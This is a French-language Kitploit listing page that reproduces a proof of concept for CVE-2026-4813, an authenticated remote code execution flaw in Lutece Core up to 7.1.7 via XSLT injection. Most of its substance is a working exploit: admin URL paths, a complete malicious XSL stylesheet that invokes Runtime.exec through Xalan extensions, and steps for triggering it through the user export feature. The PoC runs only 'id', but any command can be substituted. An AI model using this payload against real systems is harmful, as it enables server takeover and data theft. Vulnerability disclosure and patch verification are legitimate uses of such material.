Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-4813 — Preuve de concept d'exploitation pour l'exécution de code à distance authentifiée via une injection XSLT dans Lutece Core, démontrant l'exécution de commandes à travers des feuilles de style XSL conçues à cet effet. | Kitploit
Outils/GitHubGitHub/trachinus/cve-2026-4813
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubtrachinus/cve-2026-4813

CVE-2026-4813

Preuve de concept d'exploitation pour l'exécution de code à distance authentifiée via une injection XSLT dans Lutece Core, démontrant l'exécution de commandes à travers des feuilles de style XSL conçues à cet effet.

Voir le dépôt
il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-4813 (CVSS-B 9.4 CRITIQUE)

RCE authentifié via injection XSLT dans Lutece Core <= 7.1.7

> Explications et plus sur mon site web <

PoC

Vous avez besoin d'un compte avec des privilèges administrateur.

  1. Sur le panneau d'administration, accédez à la page de gestion des exports XSL : /jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport

  2. Cliquez sur « Ajouter une nouvelle feuille de transformation ».

  3. Téléversez un fichier .xsl avec le payload (simple commande id) :

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
    xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
    xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
    
    <xsl:template match="/">
        <xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
        <xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
        
        <xsl:variable name="reader" select="is:new($inputStream)"/>
        <xsl:variable name="buffereReader" select="br:new($reader)"/>
        <xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
        
        <Output>
            <xsl:value-of select="$resultat"/>
        </Output>
    </xsl:template>
</xsl:stylesheet>
  1. Enregistrez la nouvelle feuille XSL.

  2. Accédez à la page d'export des utilisateurs : /jsp/admin/user/ExportUsers.jsp

  3. Sélectionnez la feuille de transformation que nous venons de créer et validez.

  4. Le résultat de la commande id devrait se trouver dans le fichier exporté.

Télécharger l’outil